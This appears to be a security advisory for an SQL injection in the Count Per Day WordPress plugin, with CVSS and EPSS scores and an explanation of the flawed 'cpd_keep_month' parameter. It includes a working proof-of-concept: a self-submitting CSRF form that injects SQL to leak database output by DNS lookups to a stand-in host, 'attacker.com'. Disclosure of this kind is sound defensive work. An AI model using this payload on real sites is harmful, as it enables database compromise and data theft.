7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.002 Low
EPSS
Percentile
56.2%
High-Tech Bridge Security Research Lab discovered SQL Injection vulnerability in Count Per Day WordPress plugin, which can be exploited to execute arbitrary SQL queries in application’s database, gain control of potentially sensitive information and compromise the entire website.
The vulnerability is caused by insufficient filtration of input data passed via the “cpd_keep_month” HTTP POST parameter to “/wp-admin/options-general.php” script. A remote user with administrative privileges can manipulate SQL queries, inject and execute arbitrary SQL commands within the application’s database.
This vulnerability can be exploited by anonymous attacker via CSRF vector, since the web application does not check origin of HTTP requests.
The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for version()
(or any other sensetive output from the database) subdomain of “.attacker.com” (a domain name, DNS server of which is controlled by the attacker):
<form action = “http://wordpress/wp-admin/options-general.php?page=count-per-day/counter-op tions.php&tab=tools” method = “POST” name=“f1”>
<input type=“hidden” name=“collect” value=“Collect old data”>
<input type=“hidden” name=“do” value=“cpd_collect”>
<input type=“hidden” name=“cpd_keep_month” value=“6 MONTH) AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) – 2”>
<input value="go type=“submit” />
</form><script>document.f1.submit();</script>
CPE | Name | Operator | Version |
---|---|---|---|
count per day wordpress plugin | le | 3.4 |
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.002 Low
EPSS
Percentile
56.2%